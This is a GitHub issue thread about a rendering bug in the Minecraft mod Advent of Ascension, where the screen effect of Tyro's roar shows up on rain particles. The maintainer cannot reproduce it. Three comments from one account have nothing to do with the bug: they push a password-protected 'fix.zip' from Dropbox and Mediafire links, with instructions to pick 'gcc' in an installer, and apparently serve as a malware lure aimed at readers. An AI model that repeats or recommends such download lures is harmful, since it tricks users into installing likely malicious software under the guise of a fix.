### ISSUE TITLE
Screen effect of Tyro's roar appears on pixons(?)

### ISSUE THREAD

**Issue by Moshanxi** [Tslat/Advent-Of-Ascension#4365]
The screen effect can change rain particles slightly so I suppose something wrong with pixons.
![image](https://github.com/user-attachments/assets/4ab8ab72-4df2-4d27-aa1a-f2b0a9f9556a)
![image](https://github.com/user-attachments/assets/0fd27a49-b8ad-4ae1-9069-3c03cdc1eb6f)
![image](https://github.com/user-attachments/assets/1e0c20ab-0fe8-482d-878c-03ead426740b)

**Comment by Moshanxi** [comment]
TBH it's a nice hint lol

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tslat** [comment]
I can't seem to replicate this 🤔

**Comment by Moshanxi** [comment]
put the video on bilibili. not sure if relative to other mods. 
https://www.bilibili.com/video/BV1UBsjeEEix/
![image](https://github.com/user-attachments/assets/2ad0f722-edc1-4fc1-b08e-2defe8466476)

**Comment by Tslat** [comment]
Could always try binary search to see if it is affected by something
